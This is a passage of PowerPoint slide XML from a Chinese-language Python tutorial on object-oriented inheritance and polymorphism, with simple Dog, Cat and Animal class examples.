        <p:spPr>
          <a:xfrm>
            <a:off x="213964" y="562060"/>
            <a:ext cx="8534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继承</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inheritance, is-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文新魏" panose="0201080004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1400" dirty="0"/>
              <a:t>不想同一段代码写好几遍，便于代码重用。当定义一个从现有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>继承的类，这个新类称为派生类或子类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>(Subclass)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>。被继承的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>称为基类、父类或超类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Base class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Super class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr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3995936" y="1085280"/>
            <a:ext cx="426531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继承的特点：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/>
              <a:t>在继承中基类的构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>方法不会被自动调用，它需要在其派生类的构造中亲自专门调用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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2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200" dirty="0"/>
              <a:t>在调用基类的方法时，需要加上基类的类名前缀，且需要带上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>参数变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>而类中调用普通函数时不需要带上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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2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200" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>它不能在派生类中找到对应的方法，才开始到基类中逐个查找，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>经典类深度优先，新式类广度优先。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0082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12761" y="1114116"/>
            <a:ext cx="3528392" cy="3591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class Dog(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>新式类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000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u"Dog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>公有属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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__name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u"Dog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>私有属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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 err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__(self):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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self.sound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wang~wang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>~~"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self.weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "50kg"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 err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bark(self):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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self.sound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TaiDi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Dog):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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__(self):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#Dog.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__(self)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    super(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TaiDi,self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__()#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>仅新式类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000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self.sound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "woo~~~woo~~~~~~ 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000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 err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>taidi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TaiDi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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 err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>taidi.bark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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</a:rPr>
              <a:t>taidi.weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>taidi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__)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000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print(taidi.name)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73993" y="3193906"/>
            <a:ext cx="4464496" cy="15622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60287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400" dirty="0"/>
              <a:t>继承</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>函数：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函数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3"/>
              </a:rPr>
              <a:t>isinstance()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用于检查实例类型：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isinstance(obj,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int)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只有在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obj.__class__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是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4"/>
              </a:rPr>
              <a:t>int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或其它从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4"/>
              </a:rPr>
              <a:t>int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继承的类型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Lat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Lat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函数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5"/>
              </a:rPr>
              <a:t>issubclass()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用于检查类继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issubclass(bool,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int)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为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，因为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6"/>
              </a:rPr>
              <a:t>bool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是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4"/>
              </a:rPr>
              <a:t>int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的子类。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Lat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Lat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然而，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issubclass(float,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int)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为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74C3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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，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7"/>
              </a:rPr>
              <a:t>float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不是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B59B6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lato"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>int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的子类。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38366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4" y="163892"/>
            <a:ext cx="3925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OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三大特性封装、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继承</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>多态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262721"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="2627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3030" r="15085" b="3031"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4018202" y="807410"/>
            <a:ext cx="4370222" cy="1692851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3302" y="557861"/>
            <a:ext cx="3313112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(B,C):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131567" y="2998861"/>
            <a:ext cx="216253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save(self):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1.save()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#结果为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605887" y="2998860"/>
            <a:ext cx="220115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D(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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save(self):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1=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1.save()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#结果为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come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下箭头 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4788024" y="2662240"/>
            <a:ext cx="216024" cy="22441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 rot="10800000">
            <a:off x="7308304" y="2638595"/>
            <a:ext cx="216024" cy="224414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4" y="163892"/>
            <a:ext cx="3925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OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三大特性封装、继承、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多态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213964" y="624064"/>
            <a:ext cx="84728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多态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>polymorphism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>多态即对方法的重载。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>里氏替换原则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>派生类对象能够替代其基类对象被使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>中可以在两个不相干的类中定义同样的方法接口，从而实现多态性，典型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>鸭子类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" i="1" dirty="0">
              <a:latin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254" y="1209372"/>
            <a:ext cx="237626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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Animal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>(object):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> def run(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>Animal is running...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>(Animal):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> def run(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>Dog is running...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>(Animal):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> def run(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>Cat is running...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>God</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>(object):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> def run(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  print(</a:t>
            </a:r>
            <a:r>
